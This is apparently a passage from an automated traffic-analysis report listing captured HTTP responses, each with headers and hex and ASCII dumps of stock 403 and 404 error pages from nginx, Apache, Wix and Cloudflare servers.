73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 37 35 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 68 32 20 7b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:50:50 GMTContent-Type: text/htmlContent-Length: 548X-Seen-By: GXNXSWFXisshliUcwO20NXdyD4zpCpFzpCPkLds0yMepe296fMW5KF9VDXVotyUV,qquldgcFrj2n046g4RNSVLeuNqwcdH46iMA2Je1RdMI=X-Wix-Request-Id: 1685537450.266367624774616733X-Content-Type-Options: nosniffServer: Pepyaka/1.19.10Via: 1.1 googleData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:50:50 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GwxXiWd%2F6pA4XWRhGJaro5NXXX0gQeCPp%2BZshCouYaUT6RoHUbBrO5ICJlN6nQPp7Vv5Xc%2BfWHeHxVtlXtiPzUH0WPFAQvKLaf3dct%2BS5w9U2CwSq2DxGCXBqEgEcAXv"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7cff58483bb418c9-FRAData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:50:50 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vELuMSVW3dzG3Co8Cs0zoJpsAu0wOZF1hmFKCSAU7C6pPIRMLqCYPAozwWKUjKLVTH1YUP9f5Ck7mRYgyvIm3csrHLeK%2FJDDBpzGzTIwvvRAZbnWiQU8mlv%2B8L3RQzNT"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7cff5849ddec18c9-FRAData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 31 May 2023 12:50:50 GMTContent-Type: text/htmlContent-Length: 19268Connection: keep-aliveServer: ApacheLast-Modified: Fri, 13 May 2022 08:04:11 GMTAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 59 61 6b 75 48 61 6e 4a 50 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 e3 82 b7 e3 83 83 e3 82 af 2c 20 22 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 22 2c 20 22 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 20 50 72 6f 4e 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 4e 22 2c 20 56 65 72 64 61 6e 61 2c 20 4d 65 69 72 79 6f 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 30 33 32 33 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 30 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 34 37 45 46 30 3b 0a 20 20 20 20 20 20 7d 0a 2
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:50:51 GMTServer: Apache/2.4.56 (Unix) OpenSSL/1.0.2k-fipsContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:50:51 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveCache-Control: max-age=15Expires: Wed, 31 May 2023 12:51:06 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gg8AKs%2FRWQwpo7B%2Bai9roEvz1JwIUwzivDa1EIzB9BU70t%2Fm2KfA%2FuurABET9IGpZYCyFNU2x475MWIFQdCH3hsMy2qkyOowLS%2FTvSsWKtpm0hm6EX7OUNA0vGzPpA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 7cff58510d223679-FRAalt-svc: h3=":443"; ma=86400Data Raw: 31 31 61 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d Data Ascii: 11a0<!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Com
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:50:51 GMTServer: Apache/2.4.56 (Unix) OpenSSL/1.0.2k-fipsContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:50:52 GMTContent-Type: text/htmlContent-Length: 548X-Seen-By: GXNXSWFXisshliUcwO20NXdyD4zpCpFzpCPkLds0yMd/151owQ/lnPQAbZp+OUtp,qquldgcFrj2n046g4RNSVL5pznunIc8dqFlAvDKHESQ=X-Wix-Request-Id: 1685537452.301161310162415762X-Content-Type-Options: nosniffServer: Pepyaka/1.19.10Via: 1.1 googleData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 31 May 2023 12:50:52 GMTContent-Type: text/htmlContent-Length: 552Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:50:53 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:50:53 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:50:55 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveCache-Control: private, no-cache, no-store, must-revalidate, max-age=0Cf-Railgun: direct (starting new WAN connection)Pragma: no-cacheVary: User-Agent,User-AgentX-Turbo-Charged-By: LiteSpeedCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=cn6pWOvz%2FcjVMw5WOfDcOc5udP9MzqkAgxMCfc7Gq786eY7Gg8AfQDQ3LhOOjpFKba%2FruAkNKLChVKVCtEAiO39Fs1bzRso2CeVT4ZtcMq0%2FMe47DRi3QK%2BpzRnfG%2B656Is%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7cff5865b9541c97-FRAalt-svc: h3=":443"; ma=86400Data Raw: 34 62 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 